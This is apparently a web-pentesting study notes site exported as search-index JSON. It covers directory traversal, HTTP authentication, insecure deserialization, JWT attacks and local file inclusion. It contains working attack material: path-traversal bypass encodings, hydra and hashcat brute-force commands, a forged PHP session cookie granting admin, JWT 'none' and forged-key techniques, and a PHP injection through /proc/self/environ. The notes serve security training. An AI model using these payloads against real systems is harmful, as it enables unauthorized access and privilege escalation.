                    root directory: \"/\"\ndirectory separator: \"/\"\n

                    Windows OS' Shell':

                    root directory: \"<drive letter>:\\\"\ndirectory separator: \"\\\" or \"/\"\n

                    Classic Mac OS:

                    root directory: \"<drive letter>:\"\ndirectory separator: \":\"\n
                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#basic-exploitation","title":"Basic exploitation","text":"

                    We can use the\u00a0..\u00a0characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.

                    ../\n..\\\n..\\/\n\n\n#####\n# - URL encoding and double URL encoding\n#####\n\n# ../\n%2e%2e%2f\n%2e%2e/\n..%2f\n\n# ..\\\n%2e%2e%5c\n%2e%2e\\\n..%5c\n%252e%252e%255c\n\n... \n%252e%252e%252f\n%c0%ae%c0%ae%c0%af\n%uff0e%uff0e%u2215\n%uff0e%uff0e%u2216\n
                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#interesting-files","title":"Interesting files","text":"

                    Interesting Windows files Interesting Linux files

                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#tools-and-payloads","title":"Tools and payloads","text":"
                    • See updated chart: Attacks and tools for web pentesting.
                    • DotDotPwn - The Directory Traversal Fuzzer -\u00a0http://dotdotpwn.sectester.net
                    ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/http-authentication-schemes/","title":"HTTP Authentication Schemes","text":"

                    This resource is pretty awesome: https://learn.microsoft.com/en-us/dotnet/framework/wcf/feature-details/understanding-http-authentication.

                    I'll be (CTRL-c-CTRL-v)ing what I think it's important.

                    ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#understanding-http-authentication","title":"Understanding HTTP Authentication","text":"

                    Authentication is the process of identifying whether a client is eligible to access a resource. The HTTP protocol supports authentication as a means of negotiating access to a secure resource.

                    The initial request from a client is typically an anonymous request, not containing any authentication information. HTTP server applications can deny the anonymous request while indicating that authentication is required. The server application sends WWW-Authentication headers to indicate the supported authentication schemes.

                    ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#http-authentication-schemes_1","title":"HTTP Authentication Schemes","text":"Authentication Scheme Description Anonymous An anonymous request does not contain any authentication information. This is equivalent to granting everyone access to the resource. Basic Basic authentication sends a Base64-encoded string that contains a user name and password for the client. Base64 is not a form of encryption and should be considered the same as sending the user name and password in clear text. If a resource needs to be protected, strongly consider using an authentication scheme other than basic authentication. Digest Digest authentication is a challenge-response scheme that is intended to replace Basic authentication. The server sends a string of random data called a nonce to the client as a challenge. The client responds with a hash that includes the user name, password, and nonce, among additional information. The complexity this exchange introduces and the data hashing make it more difficult to steal and reuse the user's credentials with this authentication scheme. Digest authentication requires the use of Windows domain accounts. The digest realm is the Windows domain name. Therefore, you cannot use a server running on an operating system that does not support Windows domains, such as Windows XP Home Edition, with Digest authentication. Conversely, when the client runs on an operating system that does not support Windows domains, a domain account must be explicitly specified during the authentication. NTLM NT LAN Manager (NTLM) authentication is a challenge-response scheme that is a securer variation of Digest authentication. NTLM uses Windows credentials to transform the challenge data instead of the unencoded user name and password. NTLM authentication requires multiple exchanges between the client and server. The server and any intervening proxies must support persistent connections to successfully complete the authentication. Negotiate Negotiate authentication automatically selects between the Kerberos protocol and NTLM authentication, depending on availability. The Kerberos protocol is used if it is available; otherwise, NTLM is tried. Kerberos authentication significantly improves upon NTLM. Kerberos authentication is both faster than NTLM and allows the use of mutual authentication and delegation of credentials to remote machines. Windows Live ID The underlying Windows HTTP service includes authentication using federated protocols. However, the standard HTTP transports in WCF do not support the use of federated authentication schemes, such as Microsoft Windows Live ID. Support for this feature is currently available through the use of message security.","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#basic-http-authentication","title":"Basic HTTP Authentication","text":"

                    Basic HTTP authentication is a simple authentication mechanism used in web applications and services to restrict access to certain resources or functionalities. Basic authentication sends a Base64-encoded string that contains a user name and password for the client. Base64 is not a form of encryption and should be considered the same as sending the user name and password in clear text. If a resource needs to be protected, strongly consider using an authentication scheme other than basic authentication.

                    • Client Request: When a client (usually a web browser) makes a request to a protected resource on a server, the server responds with a 401 Unauthorized status code if the resource requires authentication.
                    • Challenge Header: In the response, the server includes a WWW-Authenticate header with the value \"Basic.\" This header tells the client that it needs to provide credentials to access the resource.
                    • Credential Format: The client constructs a string in the format username:password and encodes it in Base64. It then includes this encoded string in an Authorization header in subsequent requests. The header looks like this:

                      • Authorization: Basic
                      • Server Validation: When the server receives the request with the Authorization header, it decodes the Base64-encoded credentials, checks them against its database of authorized users, and grants access if the credentials are valid.

                      • Access Granted or Denied: If the credentials are valid, the server allows access to the requested resource by responding with the resource content and a 200 OK status code. If the credentials are invalid or missing, it continues to respond with 401 Unauthorized.
                      • ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#how-to-attack-it","title":"How to attack it","text":"

                        You can perform dictionary attacks with Burpsuite, by encoding the payload with base64. You can also use hydra.

                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#digest-http-authentication","title":"Digest HTTP Authentication","text":"

                        HTTP Digest Authentication is an authentication mechanism used in web applications and services to securely verify the identity of users or clients trying to access protected resources. It addresses some of the security limitations of Basic Authentication by employing a challenge-response mechanism and hashing to protect user credentials during transmission. However, like Basic Authentication, it's important to use HTTPS to ensure the security of the communication.

                        • Client Request: When a client (usually a web browser) makes a request to a protected resource on a server, the server responds with a 401 Unauthorized status code if authentication is required.
                        • Challenge Header: In the response, the server includes a WWW-Authenticate header with the value \"Digest.\" This header provides information needed by the client to construct a secure authentication request. Example of a WWW-Authenticate header:
                        WWW-Authenticate: Digest realm=\"Example\", qop=\"auth\", nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"\n\n# Where:\n# - **realm**: A descriptive string indicating the protection space (usually the name of the application or service).\n# - **qop (Quality of Protection)**: Specifies the quality of protection. Commonly set to \"auth.\"\n# - **nonce**: A unique string generated by the server for each request to prevent replay attacks.\n# - **opaque**: An opaque value set by the server, which the client must return unchanged in the response.\n
                        • Client Response: The client constructs a response using the following components: Username, Realm, Password, Nonce, Request URI (the path to the protected resource), HTTP method (e.g., GET, POST), cnonce (a client-generated nonce), qop (the quality of protection), H(A1) and H(A2), which are hashed values derived from the components. It then calculates a response hash (response) based on these components and includes it in an Authorization header. Example Authorization header:
                        Authorization: Digest username=\"user\", realm=\"Example\", nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", uri=\"/resource\", qop=auth, nc=00000001, cnonce=\"0a4f113b\", response=\"6629fae49393a05397450978507c4ef1\", opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"\n
                        • Server Validation: The server receives the request with the Authorization header and validates the response hash calculated by the client. It does this by reconstructing the same components and calculating its own response hash. If the hashes match, the server considers the client authenticated and grants access to the requested resource.
                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#how-to-attack-it_1","title":"How to attack it","text":"

                        We can use hydra.

                        hydra -l admin -P /root/Desktop/wordlists/100-common-passwords.txt http-get://192.155.195.3/digest/\n\nhydra 192.155.195.3 -l admin -P /root/Desktop/wordlists/100-common-passwords.txt http-get /digest/\n
                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#multifactor-authentication","title":"Multifactor Authentication","text":"","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#otp","title":"OTP","text":"

                        OTP (One-Time Password) security is a two-factor authentication (2FA) method used to enhance the security of user accounts and systems. OTPs are temporary, single-use codes that are typically generated and sent to the user's registered device (such as a mobile phone) to verify their identity during login or transaction processes. The primary advantage of OTPs is that they are time-sensitive and expire quickly, making them difficult for attackers to reuse.

                        For bruteforcing OTPs OWASZAP is more recommended since it does not introduce delays or throttling.

                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#types-of-otps","title":"Types of OTPs","text":"
                        • Time-Based OTPs (TOTP): TOTP is a widely used OTP method that generates codes based on a shared secret key and the current time. These codes are typically valid for a short duration, often 30 seconds.
                        • SMS-Based OTPs: OTPs can be sent to users via SMS messages. When users log in, they receive an OTP on their mobile phone, which they must enter to verify their identity.
                        • Rate Limiting and Lockout: Implement rate limiting and account lockout mechanisms to prevent brute force attacks on OTPs. Lockout accounts after a certain number of failed OTP attempts. OTP rate limiting is a security mechanism used to prevent brute force attacks or abuse of one-time password (OTP) systems, such as those used in two-factor authentication (2FA). Rate limiting restricts the number of OTP verification attempts that can be made within a specified time period. By enforcing rate limits, organizations can reduce the risk of attackers guessing or trying out multiple OTPs in quick succession.
                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/insecure-deserialization/","title":"Insecure deserialization","text":"

                        Insecure deserialization is when user-controllable data is deserialized by a website. This potentially enables an attacker to manipulate serialized objects in order to pass harmful data into the application code.

                        Sources for these notes
                        • Portswigger: Insecure deserialization.
                        • Hacktricks: Deserialization.
                        • OWASP deserialization Cheat sheet.
                        Tools
                        • Java: ysoserial
                        • PHP: phpggc.
                        • Burpsuite Extensions: Java Deserialization Scanner, PHP Object Injection Slinger, PHP Object Injection Check
                        • Exploits: Ruby 2.X generic deserialization to RCE gadget chain
                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#what-is-deserialization","title":"What is deserialization","text":"
                        • Serialization\u00a0is the process of converting complex data structures, such as objects and their fields, into a \"flatter\" format that can be sent and received as a sequential stream of bytes.

                        • Deserialization\u00a0is the process of restoring this byte stream to a fully functional replica of the original object, in the exact state as when it was serialized.

                        Exactly how objects are serialized depends on the language. Some languages serialize objects into binary formats, whereas others use different string formats, with varying degrees of human readability. \u00a0

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#identifying","title":"Identifying","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#php","title":"PHP","text":"

                        PHP uses a mostly human-readable string format, with letters representing the data type and numbers representing the length of each entry.

                        For example, consider a\u00a0User\u00a0object with the attributes:

                        $user->name = \"carlos\"; $user->isLoggedIn = true;

                        When serialized, this object may look something like this:

                        O:4:\"User\":2:{s:4:\"name\":s:6:\"carlos\"; s:10:\"isLoggedIn\":b:1;}

                        - `O:4:\"User\"`\u00a0- An object with the 4-character class name\u00a0`\"User\"`\n- `2`\u00a0- the object has 2 attributes\n- `s:4:\"name\"`\u00a0- The key of the first attribute is the 4-character string\u00a0`\"name\"`\n- `s:6:\"carlos\"`\u00a0- The value of the first attribute is the 6-character string\u00a0`\"carlos\"`\n- `s:10:\"isLoggedIn\"`\u00a0- The key of the second attribute is the 10-character string\u00a0`\"isLoggedIn\"`\n- `b:1`\u00a0- The value of the second attribute is the boolean value\u00a0`true`\n

                        The native methods for PHP serialization are\u00a0serialize()\u00a0and\u00a0unserialize(). If you have source code access, you should start by looking for\u00a0unserialize()\u00a0anywhere in the code and investigating further.

                        In PHP, specific magic methods are utilized during the serialization and deserialization processes:

                        • __sleep: Invoked when an object is being serialized. This method should return an array of the names of all properties of the object that should be serialized. It's commonly used to commit pending data or perform similar cleanup tasks.

                        • __wakeup: Called when an object is being deserialized. It's used to reestablish any database connections that may have been lost during serialization and perform other reinitialization tasks.

                        • __unserialize: This method is called instead of __wakeup (if it exists) when an object is being deserialized. It gives more control over the deserialization process compared to __wakeup.

                        • __destruct: This method is called when an object is about to be destroyed or when the script ends. It's typically used for cleanup tasks, like closing file handles or database connections.

                        • __toString: This method allows an object to be treated as a string. It can be used for reading a file or other tasks based on the function calls within it, effectively providing a textual representation of the object.

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#java","title":"Java","text":"

                        Some languages, such as Java, use binary serialization formats.

                        To distinguish it: serialized Java objects always begin with the same bytes, which are encoded as\u00a0ac ed\u00a0in hexadecimal and\u00a0rO0\u00a0in Base64.

                        Any class that implements the interface\u00a0java.io.Serializable\u00a0can be serialized and deserialized.

                        If you have source code access, take note of any code that uses the\u00a0readObject()\u00a0method, which is used to read and deserialize data from an\u00a0InputStream.

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#attacks","title":"Attacks","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#1-manipulate-serialized-objects","title":"1. Manipulate serialized objects","text":"

                        If you have source code access, take note of any code that uses the\u00a0readObject()\u00a0method, which is used to read and deserialize data from an\u00a0InputStream.

                        As a simple example, consider a website that uses a serialized\u00a0User\u00a0object to store data about a user's session in a cookie. If an attacker spotted this serialized object in an HTTP request, they might decode it to find the following byte stream:

                        O:4:\"User\":2:{s:8:\"username\";s:6:\"carlos\";s:7:\"isAdmin\";b:0;}

                        The\u00a0isAdmin\u00a0attribute is an obvious point of interest. An attacker could simply change the boolean value of the attribute to\u00a01\u00a0(true), re-encode the object, and overwrite their current cookie with this modified value. In isolation, this has no effect. However, let's say the website uses this cookie to check whether the current user has access to certain administrative functionality:

                        $user = unserialize($_COOKIE); \nif ($user->isAdmin === true)\n{ // allow access to admin interface }\n

                        This vulnerable code would instantiate a\u00a0User\u00a0object based on the data from the cookie, including the attacker-modified\u00a0isAdmin\u00a0attribute. At no point is the authenticity of the serialized object checked. This data is then passed into the conditional statement and, in this case, would allow for an easy privilege escalation.

                        Burpsuite lab

                        Burpsuite Lab: Modifying serialized objects

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#2-modify-data-types","title":"2. Modify data types","text":"

                        PHP-based logic is particularly vulnerable to this kind of manipulation due to the behavior of its loose comparison operator (==) when comparing different data types.

                        Reference: PHP type juggling

                        Additionally, if we spot a session cookie base64-encoded with an object, such as this PHP one, we can try to modify it.

                        Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJieno5ZmJ2OHV6YXM3MTRlcnJuaGExcTVwcGJ6eWY1aCI7fQ%3d%3d\n

                        Decoded from base64

                        O:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:12:\"access_token\";s:32:\"bzz9fbv8uzas714errnha1q5ppbzyf5h\";}\n

                        s refers to string, and i to integer. We could modify the input and the data type modifying the object to:

                        O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0:\"\";}\n

                        Afterwards, base64 encode the object to insert it as the cookie session:

                        Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDoiIjt9\n

                        Explanation: Let's say an attacker modified the password attribute so that it contained the integer\u00a00\u00a0instead of the expected string. As long as the stored password does not start with a number, the condition would always return\u00a0true, enabling an authentication bypass. Note that this is only possible because deserialization preserves the data type. If the code fetched the password from the request directly, the\u00a00\u00a0would be converted to a string and the condition would evaluate to\u00a0false.

                        Burpsuite lab

                        Burpsuite Lab: Modifying serialized data types

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#3-abuse-application-functionality","title":"3. Abuse application functionality","text":"

                        A website's functionality might also perform dangerous operations on data from a deserialized object. In this case, you can use insecure deserialization to pass in unexpected data and leverage the related functionality to do damage.

                        For example, as part of a website's \"Delete user\" functionality, the user's profile picture is deleted by accessing the file path in the\u00a0$user->image_location\u00a0attribute. If this\u00a0$user\u00a0was created from a serialized object, an attacker could exploit this by passing in a modified object with the\u00a0image_location\u00a0set to an arbitrary file path.

                        Burpsuite lab

                        Burpsuite Lab: Using application functionality to exploit insecure deserialization

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#4-magic-methods","title":"4. Magic methods","text":"

                        Magic methods are a special subset of methods that are invoked automatically whenever a particular event or scenario occurs. \u00a0One of the most common examples in PHP is\u00a0__construct(), which is invoked whenever an object of the class is instantiated, similar to Python's\u00a0__init__. Typically, constructor magic methods like this contain code to initialize the attributes of the instance. However, magic methods can be customized by developers to execute any code they want.

                        PHP -> Most importantly in this context, some languages have magic methods that are invoked automatically\u00a0during\u00a0the deserialization process. For example, PHP's\u00a0unserialize()\u00a0method looks for and invokes an object's\u00a0__wakeup()\u00a0magic method.

                        JAVA -> In Java deserialization, the same applies to the\u00a0ObjectInputStream.readObject()\u00a0method, which is used to read data from the initial byte stream and essentially acts like a constructor for \"re-initializing\" a serialized object. However,\u00a0Serializable\u00a0classes can also declare their own\u00a0readObject()\u00a0method as follows:

                        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException \n{ \n    // implementation \n}\n

                        A\u00a0readObject()\u00a0method declared in exactly this way acts as a magic method that is invoked during deserialization. This allows the class to control the deserialization of its own fields more closely.

                        You should pay close attention to any classes that contain these types of magic methods. They allow you to pass data from a serialized object into the website's code before the object is fully deserialized. This is the starting point for creating more advanced exploits.

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#5-inject-arbitrary-objects","title":"5. Inject arbitrary objects","text":"

                        The methods available to an object are determined by its class. Deserialization methods do not typically check what they are deserializing. This means that you can pass in objects of any serializable class that is available to the website, and the object will be deserialized.

                        The fact that this object is not of the expected class does not matter. The unexpected object type might cause an exception in the application logic, but the malicious object will already be instantiated by then.

                        Burpsuite lab

                        Burpsuite Lab: Arbitrary object injection in PHP

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#6-gadget-chains","title":"6. Gadget chains","text":"

                        Classes containing these deserialization magic methods can also be used to initiate more complex attacks involving a long series of method invocations, known as a \"gadget chain\".

                        A \"gadget\" is a snippet of code that exists in the application that can help an attacker to achieve a particular goal. An individual gadget may not directly do anything harmful with user input. However, the attacker's goal might simply be to invoke a method that will pass their input into another gadget. By chaining multiple gadgets together in this way, an attacker can potentially pass their input into a dangerous \"sink gadget\", where it can cause maximum damage.

                        It is important to note that the vulnerability is the deserialization of user-controllable data, not the mere presence of a gadget chain in the website's code or any of its libraries.

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#prebuilt-gadget-chains","title":"Prebuilt gadget chains","text":"

                        Java: ysoserial

                        PHP: phpggc

                        About ysoserial: Not all of the gadget chains in ysoserial enable you to run arbitrary code. Instead, they may be useful for other purposes. For example, you can use the following ones to help you quickly detect insecure deserialization on virtually any server: - The\u00a0URLDNS\u00a0chain triggers a DNS lookup for a supplied URL. Most importantly, it does not rely on the target application using a specific vulnerable library and works in any known Java version. This makes it the most universal gadget chain for detection purposes. If you spot a serialized object in the traffic, you can try using this gadget chain to generate an object that triggers a DNS interaction with the Burp Collaborator server. If it does, you can be sure that deserialization occurred on your target. - JRMPClient\u00a0is another universal chain that you can use for initial detection. It causes the server to try establishing a TCP connection to the supplied IP address. Note that you need to provide a raw IP address rather than a hostname. This chain may be useful in environments where all outbound traffic is firewalled, including DNS lookups. You can try generating payloads with two different IP addresses: a local one and a firewalled, external one. If the application responds immediately for a payload with a local address, but hangs for a payload with an external address, causing a delay in the response, this indicates that the gadget chain worked because the server tried to connect to the firewalled address. In this case, the subtle time difference in responses can help you to detect whether deserialization occurs on the server, even in blind cases.

                        Burpsuite lab

                        Burpsuite Lab: Exploiting Java deserialization with Apache Commons

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#documented-gadget-chains","title":"Documented gadget chains","text":"

                        There may not always be a dedicated tool available for exploiting known gadget chains in the framework used by the target application. In this case, it's always worth looking online to see if there are any documented exploits that you can adapt manually.

                        Burpsuite lab

                        Burpsuite Lab: Exploiting Ruby deserialization using a documented gadget chain

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#7-your-own-exploit","title":"7. Your own exploit","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#8-phar-deserialization","title":"8. PHAR deserialization","text":"

                        PHP provides several URL-style wrappers that you can use for handling different protocols when accessing file paths. One of these is the\u00a0phar://\u00a0wrapper, which provides a stream interface for accessing PHP Archive (.phar) files.

                        The PHP documentation reveals that\u00a0PHAR\u00a0manifest files contain serialized metadata. Crucially, if you perform any filesystem operations on a\u00a0phar://\u00a0stream, this metadata is implicitly deserialized.

                        This means that a\u00a0phar://\u00a0stream can potentially be a vector for exploiting insecure deserialization.

                        The explanation: This technique requires you to upload the\u00a0PHAR\u00a0to the server somehow. One approach is to use an image upload functionality, for example. If you are able to create a polyglot file, with a\u00a0PHAR\u00a0masquerading as a simple\u00a0JPG, you can sometimes bypass the website's validation checks. If you can then force the website to load this polyglot \"JPG\" from a\u00a0phar://\u00a0stream, any harmful data you inject via the\u00a0PHAR\u00a0metadata will be deserialized. As the file extension is not checked when PHP reads a stream, it does not matter that the file uses an image extension. As long as the class of the object is supported by the website, both the\u00a0__wakeup()\u00a0and\u00a0__destruct()\u00a0magic methods can be invoked in this way, allowing you to potentially kick off a gadget chain using this technique.

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#9-memory-corruption","title":"9. Memory corruption","text":"

                        Even without the use of gadget chains, it is still possible to exploit insecure deserialization. If all else fails, there are often publicly documented memory corruption vulnerabilities that can be exploited via insecure deserialization. TDeserialization methods, such as PHP's\u00a0unserialize()\u00a0are rarely hardened against these kinds of attacks, and expose a huge amount of attack surface.

                        ","tags":["web","pentesting","attack"]},{"location":"webexploitation/jwt-attacks/","title":"Json Web Token attacks","text":"Resources

                        https://github.com/Crypto-Cat/CTF/tree/main/web/WebSecurityAcademy/jwt

                        JSON web tokens (JWTs) are a standardized format for sending cryptographically signed JSON data between systems.

                        The server that issues the token typically generates the signature by hashing the header and payload. In some cases, they also encrypt the resulting hash.

                        • As the signature is directly derived from the rest of the token, changing a single byte of the header or payload results in a mismatched signature.

                        • Without knowing the server's secret signing key, it shouldn't be possible to generate the correct signature for a given header or payload.

                        JSON Web Signature (JWS) -

                        JSON Web Encryption (JWE) - The contents of the token are encrypted.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#jwt-signature-verification-attack","title":"JWT signature verification attack","text":"","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#1-server-not-verifying-the-signature","title":"1. Server not verifying the signature","text":"

                        If the server doesn't verify the signature properly, there's nothing to stop an attacker from making arbitrary changes to the rest of the token.

                        For example, consider a JWT containing the following claims:

                        { \"username\": \"carlos\", \"isAdmin\": false }

                        If the server identifies the session based on this\u00a0username, modifying its value might enable an attacker to impersonate other logged-in users. Similarly, if the\u00a0isAdmin\u00a0value is used for access control, this could provide a simple vector for privilege escalation.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#2-accepting-arbitrary-signatures","title":"2. Accepting arbitrary signatures","text":"

                        JWT libraries typically provide one method for verifying tokens and another that just decodes them. For example, the Node.js library\u00a0jsonwebtoken\u00a0has\u00a0verify()\u00a0and\u00a0decode().

                        Occasionally, developers confuse these two methods and only pass incoming tokens to the\u00a0decode()\u00a0method. This effectively means that the application doesn't verify the signature at all.

                        Payload can be changed with no limitation.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#3-accepting-tokens-with-no-signature","title":"3. Accepting tokens with no signature","text":"

                        Otherwise called the \"none\" attack. JWTs can be signed using a range of different algorithms, but can also be left unsigned. In this case, the\u00a0alg\u00a0parameter is set to\u00a0none, which indicates a so-called \"unsecured JWT\".

                        \"alg\" parameter can therefore be set to:

                        none\nNone\nNONE\nNoNE\n

                        Then, the attacker can be modify the payload.

                        Finally, the payload part must still be terminated with a trailing dot.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#4-brute-forcing-secret-keys","title":"4. Brute-forcing secret keys","text":"

                        When implementing JWT applications, developers sometimes make mistakes like forgetting to change default or placeholder secrets.

                        jwt secrets payloads

                        https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

                        hashcat -a 0 -m 16500 <jwt> <wordlist>\n

                        If you run the command more than once, you need to include the\u00a0--show\u00a0flag to output the results.

                        Once you have identified the secret key, you can use it to generate a valid signature. Use JWT Editor for that (tab Keys.)

                        Then, send you request to Repeater. In Repeater go to JSON Web Token tab, modify the payload and click on Sign. Select your signature.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#5-jwt-header-parameter-injections","title":"5. JWT header parameter injections","text":"

                        According to the JWS specification, only the\u00a0alg\u00a0header parameter is mandatory. In practice, however, JWT headers (also known as JOSE headers) often contain several other parameters. The following ones are of particular interest to attackers.

                        • jwk\u00a0(JSON Web Key) - Provides an embedded JSON object representing the key.

                        • jku\u00a0(JSON Web Key Set URL) - Provides a URL from which servers can fetch a set of keys containing the correct key.

                        • kid\u00a0(Key ID) - Provides an ID that servers can use to identify the correct key in cases where there are multiple keys to choose from. Depending on the format of the key, this may have a matching\u00a0kid\u00a0parameter.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#51-injecting-self-signed-jwts-via-the-jwk-parameter","title":"5.1. Injecting self-signed JWTs via the jwk parameter","text":"

                        The JSON Web Signature (JWS) specification describes an optional\u00a0jwk\u00a0header parameter, which servers can use to embed their public key directly within the token itself in JWK format.

                        How to perform the attack with Burpsuite:

                        1. With the extension loaded, in Burp's main tab bar, go to the JWT Editor Keys tab.\n\n2. Generate a new RSA key.\n\n3. Send a request containing a JWT to Burp Repeater.\n\n4. In the message editor, switch to the extension-generated JSON Web Token tab and modify the token's payload however you like.\n\n5. Click Attack, then select Embedded JWK. When prompted, select your newly generated RSA key.\n\n6. Send the request to test how the server responds.\n
                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#52-injecting-self-signed-jwts-via-the-jku-parameter","title":"5.2. Injecting self-signed JWTs via the jku parameter","text":"

                        Instead of embedding public keys directly using the\u00a0jwk\u00a0header parameter, some servers let you use the\u00a0jku\u00a0(JWK Set URL) header parameter to reference a JWK Set containing the key. When verifying the signature, the server fetches the relevant key from this URL.

                        A JWK Set is a JSON object containing an array of JWKs representing different keys. You can see an example of this below.

                        { \"keys\": [ { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"75d0ef47-af89-47a9-9061-7c02a610d5ab\", \"n\": \"o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ\" }, { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA\", \"n\": \"fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw\" } ] }`\n

                        JWK Sets like this are sometimes exposed publicly via a standard endpoint, such as\u00a0/.well-known/jwks.json.

                        So a way to trick this validation is by creating our own set of RSA keys.

                        Then, have a server serving these keys.

                        Then, modify the payload of the JWT.

                        And finally, modify the head, by adding the kdi corresponding to our crafted RSA key, and a jkuparameter pointing to our server serving the keys. With this configuration we can use 'JWT Editor' in BurpSuite to sign the new crafted JWT.

                        ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#53-injecting-self-signed-jwts-via-the-kid-parameter","title":"5.3. Injecting self-signed JWTs via the kid parameter","text":"","tags":["web","pentesting","jwt"]},{"location":"webexploitation/local-file-inclusion-lfi/","title":"LFI attack - Local File Inclusion","text":"OWASP

                        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                        ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)

                        Local File Inclusion (LFI) is a type of security vulnerability that occurs when an application allows an attacker to include files on the server through the web browser. File inclusion in web applications refers to the practice of including external files, often scripts or templates, into a web page dynamically. It is a fundamental concept used to create dynamic and modular web applications.

                        LFI vulnerabilities typically occur due to poor input validation or lack of proper security mechanisms in web applications. Attackers exploit these vulnerabilities by manipulating input parameters that are used to specify file paths or filenames within the application:

                        • File Inclusion Functions: Functions like include(), require(), or file_get_contents() that accept user-controlled input for file paths.
                        • HTTP Parameters: Input fields in web forms or query parameters in URLs.
                        • Cookies: If an application uses cookies to determine the file to include.
                        • Session Variables: If session data can be manipulated to control file inclusion.

                        Impact:

                        • Information Disclosure: Attackers can read sensitive files, including configuration files, user data, and source code, exposing critical information.
                        • Remote Code Execution: In some cases, LFI can lead to the execution of arbitrary code if an attacker can include malicious PHP or other script files.
                        • Directory Traversal: LFI attacks can allow an attacker to navigate the directory structure, potentially leading to further vulnerabilities or unauthorized access.

                        LFI (Local File Inclusion): The primary objective of an LFI attack is to include and display the contents of a file on the server within the context of a web application (to get it executed).

                        Directory Traversal: Directory Traversal, also known as Path Traversal, focuses on navigating the file system's directory structure to access files or directories outside the intended path. While this can lead to LFI, the primary goal is often broader, encompassing the ability to read, modify, or delete files and directories.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#interesting-files","title":"Interesting files","text":"

                        Interesting Windows files Interesting Linux files

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#procselfenviron","title":"/proc/self/environ","text":"

                        This files contain Environment variables. One of those variables might be HTTP_USER_AGENT, which is the user agent used by the client to access the server. So by using a proxy interceptor we could modify that header to be, let's say:

                        <?phpinfo()>\n

